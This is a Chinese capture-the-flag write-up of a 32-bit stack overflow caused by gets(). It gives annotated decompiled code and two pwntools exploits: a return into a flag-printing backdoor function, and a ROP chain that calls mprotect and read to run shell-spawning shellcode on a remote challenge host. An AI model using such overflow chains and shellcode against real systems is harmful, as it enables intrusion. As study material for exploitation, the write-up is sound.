emmm最近一直埋頭於csapp,做一道題回憶回憶之前做的。這道題太大了,在main函數上方有個get_flag函數。
/*
 * Decompiler output (Hex-Rays style) of the challenge binary's main.
 * Security note: v4 is a single byte at [ebp-38h], yet gets() reads an
 * unbounded line into it, so any input longer than that slot overwrites the
 * rest of the frame including the saved return address -- the stack
 * overflow both scripts below rely on (they pad 0x38 bytes before the
 * return address). The extra printf argument is a decompilation artifact:
 * the format string contains no conversion specifier, so it is never read.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [esp+4h] [ebp-38h]  -- overflow target; only one byte is declared

  printf("Qual a palavrinha magica? ", v4);
  gets(&v4); // no length limit at all; gets() was removed from C11 for this reason
  return 0;
}
/*
 * Decompiled backdoor: prints flag.txt to stdout, but only when both
 * arguments equal the magic constants (814536271 == 0x308CD64F and
 * 425138641 == 0x195719D1 -- the two dwords the first exploit below
 * appends after the return addresses). It is never called from main; it is
 * reached only by overwriting main's return address.
 */
void __cdecl get_flag(int a1, int a2)
{
  int v2; // eax  -- FILE * from fopen; the decompiler typed it as int
  int v3; // esi  -- same stream, kept in a callee-saved register
  unsigned __int8 v4; // al
  int v5; // ecx
  unsigned __int8 v6; // al

  if ( a1 == 814536271 && a2 == 425138641 )
  {
    v2 = fopen("flag.txt", "rt"); // result is never NULL-checked: a missing file leads to getc(NULL)
    v3 = v2;
    v4 = getc(v2);
    // getc() returns int; only the low byte is kept here, so 255 is presumably
    // EOF (-1) truncated -- TODO confirm against the disassembly. A genuine
    // 0xFF byte in the file would also end the loop early.
    if ( v4 != 255 )
    {
      v5 = (char)v4;
      do
      {
        putchar(v5);
        v6 = getc(v3);
        v5 = (char)v6;
      }
      while ( v6 != 255 );
    }
    fclose(v3);
  }
}
漏洞是典型的棧溢出,需要我們構造輸入進行填寫。最開始想直接跳入get_flag函數,結果不能正確獲得結果。看了看其餘大佬的EXP,發現有什麼限制,必須維護好棧,因此得找一個函數來退出,於是利用了exit函數。
# Exploit 1 (local, original author's): overflow main's buffer, return into
# get_flag with its two magic arguments, then into exit so the process
# terminates cleanly instead of crashing when get_flag returns.
from pwn import *
context(os="linux", arch="i386", log_level="debug")
sh = process("./hhh")
flag_addr = 0x080489A0  # address of get_flag (not used below; the literal is repeated in the payload)
# 0x0804E6A0 is the address of exit (original note). It sits in get_flag's
# return-address slot; presumably the clean exit() -- which also flushes stdio --
# is why jumping straight into get_flag showed nothing. TODO confirm.
payload = cyclic(0x38) + p32(0x080489A0) + p32(0x0804E6A0)
# the next two dwords are get_flag's arguments a1/a2 (0x308CD64F == 814536271,
# 0x195719D1 == 425138641, the constants checked in the decompilation above)
payload += p32(0x308CD64F) + p32(0x195719D1)
sh.sendline(payload)
sh.recv()  # note: main does not push ebp, hence 0x38 bytes of padding reach the return address (original note)
# Defensive takeaway: the root cause is gets(); a bounded read (fgets) removes
# the overflow, and a stack canary or PIE would break this fixed-offset,
# fixed-address chain.
另一個大佬的ROP利用
這裏利用了一個後門函數
![上傳中...]()
from pwn import * #coding = utf-8 context(os="linux", arch="i386", log_level="debug") q = remote('node3.buuoj.cn',25023) elf = ELF("./hhh") mprotect_addr = elf.symbols["mprotect"] read_addr = elf.symbols["read"] start_addr = 0x80ea000 pop_3 = 0x0804f460 payload = cyclic(0x38) payload += p32(mprotect_addr) payload += p32(pop_3) payload += p32(start_addr) payload += p32(0x1000) payload += p32(0x7) #7具備rwxp payload += p32(read_addr) payload += p32(pop_3) payload += p32(0) payload += p32(start_addr) payload += p32(0x100) payload += p32(start_addr) shellcode = asm(shellcraft.sh()) q.sendline(payload) sleep(0.1) q.sendline(shellcode) q.interactive()